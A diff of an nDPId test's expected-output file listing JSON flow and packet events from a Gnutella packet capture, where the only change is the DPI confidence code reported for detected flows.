01405{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1320,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":316,"flow_packet_id":2,"flow_last_seen":100920,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":769,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":769,"pkt_l4_len":735,"thread_ts_msec":100920,"pkt":"CAAn5uVZUlQAEjUCCABFAALzBEAAAEARxyNeNkJSCgACD\/iVcAkC34d4LkYxAuq77b+oti7DkMaMrEQAAMACAAAGR1RLRwAA+wNHJRwgXbAuWugSpAUSxJsCHL8EXjZCUviVAQAAAAR+IhyrFEdUS0cAAOCbIyHZHrkrYnNgnMXp7j9XkbO8BG2EvGL1g1dTSFIAAPJ8p2NaB+IvDcmOjYwpnv4Dgo0cBBinyTW4skdUS0cAAPLJywhbkrobDN\/JQ6AnuEOyGSGjBLBjsBQYykdUS0cAAPdrnSa2ww\/WjIRLC1ipyWI+KDekBGjurPpb\/FdTSFIAAPUb1vVQWKsuipKs18obx69UnmxtBEftyls+9UdUS0cAAPXAlRBP9j9OpxXVbJllgFo1AUWcBFzZVBBO\/0dUS0cAAPk7PafFnhokmbg2Skj0CN9dtWlxBGDszQeH6kdUS0cAAP2LxejmjNINBLJfc3hRxQZnhG+dBK23t27qEEdUS0cAAMJCPsbCyFi2EKuhIjR8FOxLMgMMBKSEChnYBkdUS0cAAMs4SkQs8Plx39K+G3osYia2QR5gBLnsyIm8DkdUS0cAANFgvV19Qr+DjCD+VI9ncRVX3pcfBLyly75V61dTSFIAANEo391sZyCjuFpU0yy2PWYlrl8ABC1Yddsa\/UdUS0cAANCctnuhx+ItXQPhY9ykozj36PhcBGD2nH7bBkdUS0cAANY8nyC9cCseHTJEnvv8hZLF1GA+BEn6s+1RcEdUS0cAAN60b0CUs3pQ36DSdMP3NoNcDa2fBFOgjzCQrEdUS0cAAKZeyrvsa5mvejLQ38QnOIQ2zbdtBGQB54rc7ldTSFIAAKQeYlqSZYffwoHRlw8bFrfmBFSvBFQcNeGvO1dTSFIAAKr7G8iP9T\/W+jUmPMkpEJiqR57KBMvcaRtLPEdUS0cAAK10JPaTOb0hgYkPVi8cpzY7gtJoBFx1+WIan0dUS0cAALNy1PV19iuZm7NzjEzMA6wUOO22BFJALAsFSA=="} 00563{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1450,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":328,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":101122,"flow_last_seen":101122,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":101122,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"203.220.105.27","src_port":28681,"dst_port":19260,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1450,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":328,"flow_packet_id":1,"flow_last_seen":101122,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":101122,"pkt":"UlQAEjUCCAAn5uVZCABFAABt2AwAAIARIW0KAAIPy9xpG3AJSzwAWVR20YMxAsOjfW6uj7unlpr730QAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAONVJKmT8c3egN9Xa0CwzKQP3iGM"} -00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1450,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":328,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":101122,"flow_last_seen":101122,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":101122,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"203.220.105.27","src_port":28681,"dst_port":19260,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1450,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":328,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":101122,"flow_last_seen":101122,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":101122,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"203.220.105.27","src_port":28681,"dst_port":19260,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00561{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1451,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":329,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":101122,"flow_last_seen":101122,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":101122,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"92.117.249.98","src_port":28681,"dst_port":6815,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00536{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1451,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":329,"flow_packet_id":1,"flow_last_seen":101122,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":101122,"pkt":"UlQAEjUCCAAn5uVZCABFAABt42oAAIAR9S4KAAIPXHX5YnAJGp8AWRo4clsxAgMe5rjiFfxxH3X\/E0QAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAONVJKmT8c3egN9Xa0CwzKQP3iGM"} -00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1451,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":329,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":101122,"flow_last_seen":101122,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":101122,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"92.117.249.98","src_port":28681,"dst_port":6815,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1451,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":329,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":101122,"flow_last_seen":101122,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":101122,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"92.117.249.98","src_port":28681,"dst_port":6815,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00559{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1452,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":330,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":101122,"flow_last_seen":101122,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":101122,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"82.64.44.11","src_port":28681,"dst_port":1352,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1452,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":330,"flow_packet_id":1,"flow_last_seen":101122,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":101122,"pkt":"UlQAEjUCCAAn5uVZCABFAABt9MQAAIARu2EKAAIPUkAsC3AJBUgAWavKICYxAiIojdyDEATTYjr6S0QAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAONVJKmT8c3egN9Xa0CwzKQP3iGM"} -00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1452,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":330,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":101122,"flow_last_seen":101122,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":101122,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"82.64.44.11","src_port":28681,"dst_port":1352,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1452,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":330,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":101122,"flow_last_seen":101122,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":101122,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"82.64.44.11","src_port":28681,"dst_port":1352,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 01405{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1453,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":330,"flow_packet_id":2,"flow_last_seen":101161,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":769,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":769,"pkt_l4_len":735,"thread_ts_msec":101161,"pkt":"CAAn5uVZUlQAEjUCCABFAALzBIEAAEAR6R9SQCwLCgACDwVIcAkC356IICYxAiIojdyDEATTYjr6S0QAAMACAAAGR1RLRwAAs3LU9XX2K5mbs3OMTMwDrBQ47bYEUkAsCwVIAQAAAASFeL+FFEdUS0cAAOCbIyHZHrkrYnNgnMXp7j9XkbO8BG2EvGL1g1dTSFIAAPJ8p2NaB+IvDcmOjYwpnv4Dgo0cBBinyTW4skdUS0cAAPLJywhbkrobDN\/JQ6AnuEOyGSGjBLBjsBQYykdUS0cAAPdrnSa2ww\/WjIRLC1ipyWI+KDekBGjurPpb\/FdTSFIAAPUb1vVQWKsuipKs18obx69UnmxtBEftyls+9UdUS0cAAPXAlRBP9j9OpxXVbJllgFo1AUWcBFzZVBBO\/0dUS0cAAPsDRyUcIF2wLlroEqQFEsSbAhy\/BF42QlL4lUdUS0cAAPk7PafFnhokmbg2Skj0CN9dtWlxBGDszQeH6kdUS0cAAP2LxejmjNINBLJfc3hRxQZnhG+dBK23t27qEEdUS0cAAMJCPsbCyFi2EKuhIjR8FOxLMgMMBKSEChnYBkdUS0cAAMs4SkQs8Plx39K+G3osYia2QR5gBLnsyIm8DkdUS0cAANFgvV19Qr+DjCD+VI9ncRVX3pcfBLyly75V61dTSFIAANEo391sZyCjuFpU0yy2PWYlrl8ABC1Yddsa\/UdUS0cAANCctnuhx+ItXQPhY9ykozj36PhcBGD2nH7bBkdUS0cAANY8nyC9cCseHTJEnvv8hZLF1GA+BEn6s+1RcEdUS0cAAN60b0CUs3pQ36DSdMP3NoNcDa2fBFOgjzCQrEdUS0cAAKZeyrvsa5mvejLQ38QnOIQ2zbdtBGQB54rc7ldTSFIAAKQeYlqSZYffwoHRlw8bFrfmBFSvBFQcNeGvO1dTSFIAAKr7G8iP9T\/W+jUmPMkpEJiqR57KBMvcaRtLPEdUS0cAAK10JPaTOb0hgYkPVi8cpzY7gtJoBFx1+WIanw=="} 00562{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1454,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":331,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":101162,"flow_last_seen":101162,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":101162,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"45.31.152.112","src_port":28681,"dst_port":26851,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1454,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":331,"flow_packet_id":1,"flow_last_seen":101162,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":101162,"pkt":"UlQAEjUCCAAn5uVZCABFAABte4oAAIAR7VcKAAIPLR+YcHAJaOMAWVACTGsxArv8OnSqKZfgjqpR7EQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAONVJKmT8c3egN9Xa0CwzKQP3iGM"} -00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1454,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":331,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":101162,"flow_last_seen":101162,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":101162,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"45.31.152.112","src_port":28681,"dst_port":26851,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1454,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":331,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":101162,"flow_last_seen":101162,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":101162,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"45.31.152.112","src_port":28681,"dst_port":26851,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1456,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":247,"flow_packet_id":3,"flow_last_seen":101163,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":101163,"pkt":"UlQAEjUCCAAn5uVZCABFAABtYHkAAIARZpMKAAIPtVSyEHAJ62YAWXddengxAvwV4+vWhWE2kdf1ukQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAONVJKmT8c3egN9Xa0CwzKQP3iGM"} 00535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1458,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":246,"flow_packet_id":3,"flow_last_seen":101259,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":101259,"pkt":"UlQAEjUCCAAn5uVZCABFAABtBGcAAIARhQcKAAIPYEFEwnAJipkAWaF8mwwxArcB6GYWxEVcLYtOuEQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAONVJKmT8c3egN9Xa0CwzKQP3iGM"} 00535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1459,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":250,"flow_packet_id":3,"flow_last_seen":101259,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":101259,"pkt":"UlQAEjUCCAAn5uVZCABFAABteOQAAIAR6HIKAAIPM0SZ1nAJZo0AWYTH3zwxAjTRxsrRaTsZKs8ZWEQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAONVJKmT8c3egN9Xa0CwzKQP3iGM"} @@ -1136,13 +1136,13 @@ 01404{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1463,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":331,"flow_packet_id":2,"flow_last_seen":101305,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":769,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":769,"pkt_l4_len":735,"thread_ts_msec":101305,"pkt":"CAAn5uVZUlQAEjUCCABFAALzBIUAAEARodctH5hwCgACD2jjcAkC3267TGsxArv8OnSqKZfgjqpR7EQAAMACAAAGR1RLRwAAsVtn4eBIiuGjRFoZE1N3WpOAxkUELR+YcGjjAQAAAAQ+cByLFEdUS0cAAOCbIyHZHrkrYnNgnMXp7j9XkbO8BG2EvGL1g1dTSFIAAPJ8p2NaB+IvDcmOjYwpnv4Dgo0cBBinyTW4skdUS0cAAPLJywhbkrobDN\/JQ6AnuEOyGSGjBLBjsBQYykdUS0cAAPdrnSa2ww\/WjIRLC1ipyWI+KDekBGjurPpb\/FdTSFIAAPUb1vVQWKsuipKs18obx69UnmxtBEftyls+9UdUS0cAAPXAlRBP9j9OpxXVbJllgFo1AUWcBFzZVBBO\/0dUS0cAAPsDRyUcIF2wLlroEqQFEsSbAhy\/BF42QlL4lUdUS0cAAPk7PafFnhokmbg2Skj0CN9dtWlxBGDszQeH6kdUS0cAAP2LxejmjNINBLJfc3hRxQZnhG+dBK23t27qEEdUS0cAAMJCPsbCyFi2EKuhIjR8FOxLMgMMBKSEChnYBkdUS0cAAMs4SkQs8Plx39K+G3osYia2QR5gBLnsyIm8DkdUS0cAANFgvV19Qr+DjCD+VI9ncRVX3pcfBLyly75V61dTSFIAANEo391sZyCjuFpU0yy2PWYlrl8ABC1Yddsa\/UdUS0cAANCctnuhx+ItXQPhY9ykozj36PhcBGD2nH7bBkdUS0cAANY8nyC9cCseHTJEnvv8hZLF1GA+BEn6s+1RcEdUS0cAAN60b0CUs3pQ36DSdMP3NoNcDa2fBFOgjzCQrEdUS0cAAKZeyrvsa5mvejLQ38QnOIQ2zbdtBGQB54rc7ldTSFIAAKQeYlqSZYffwoHRlw8bFrfmBFSvBFQcNeGvO0dUS0cAAK10JPaTOb0hgYkPVi8cpzY7gtJoBFx1+WIan0dUS0cAALNy1PV19iuZm7NzjEzMA6wUOO22BFJALAsFSA=="} 00563{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1479,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":332,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":101837,"flow_last_seen":101837,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":101837,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"213.229.111.224","src_port":28681,"dst_port":4876,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1479,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":332,"flow_packet_id":1,"flow_last_seen":101837,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":101837,"pkt":"UlQAEjUCCAAn5uVZCABFAABtAsIAAIAR5ekKAAIP1eVv4HAJEwwAWTJ5PKcxAijtzcGdOPipHVZyGEQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAONVJKmT8c3egN9Xa0CwzKQP3iGM"} -00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1479,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":332,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":101837,"flow_last_seen":101837,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":101837,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"213.229.111.224","src_port":28681,"dst_port":4876,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1479,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":332,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":101837,"flow_last_seen":101837,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":101837,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"213.229.111.224","src_port":28681,"dst_port":4876,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00536{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1538,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":253,"flow_packet_id":3,"flow_last_seen":106200,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":106200,"pkt":"UlQAEjUCCAAn5uVZCABFAABtgo8AAIAR6zkKAAIPwSX\/gnAJ8LAAWcdbqxExAsF5aprYo0LmkOznoEQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAONVJKmT8c3egN9Xa0CwzKQP3iGM"} 00535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1539,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":255,"flow_packet_id":3,"flow_last_seen":106200,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":106200,"pkt":"UlQAEjUCCAAn5uVZCABFAABt7XkAAIAREsQKAAIPUD3d9nAJd3EAWRpRkUIxAvIfqgvF6WkSbnxZFUQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAONVJKmT8c3egN9Xa0CwzKQP3iGM"} 00536{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1905,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":248,"flow_packet_id":2,"flow_last_seen":106314,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":106314,"pkt":"UlQAEjUCCAAn5uVZCABFAABtDeEAAIARAL0KAAIPQh7dtXAJLuwAWUvy0dkxAnflHs8XZg0HoKrR0EQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAACidCo0G3v\/IJjwziXwskXn9hKth"} 00537{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1906,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":249,"flow_packet_id":2,"flow_last_seen":106314,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":106314,"pkt":"UlQAEjUCCAAn5uVZCABFAABthP0AAIARBkIKAAIPLVh12nAJGv0AWUikdrExAmyl2\/D4Flpgn2PiMkQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAACidCo0G3v\/IJjwziXwskXn9hKth"} 00539{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1907,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":251,"flow_packet_id":2,"flow_last_seen":106314,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":106314,"pkt":"UlQAEjUCCAAn5uVZCABFAABtv\/wAAIAR2kwKAAIPucvaXHAJ3oIAWXW3EqAxAn\/MqZ\/PxBBVRWBQQEQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAACidCo0G3v\/IJjwziXwskXn9hKth"} -00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1911,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":267,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":90738,"flow_last_seen":106390,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":99,"midstream":0,"thread_ts_msec":106390,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"200.7.155.210","src_port":50291,"dst_port":28365,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1911,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":267,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":90738,"flow_last_seen":106390,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":99,"midstream":0,"thread_ts_msec":106390,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"200.7.155.210","src_port":50291,"dst_port":28365,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 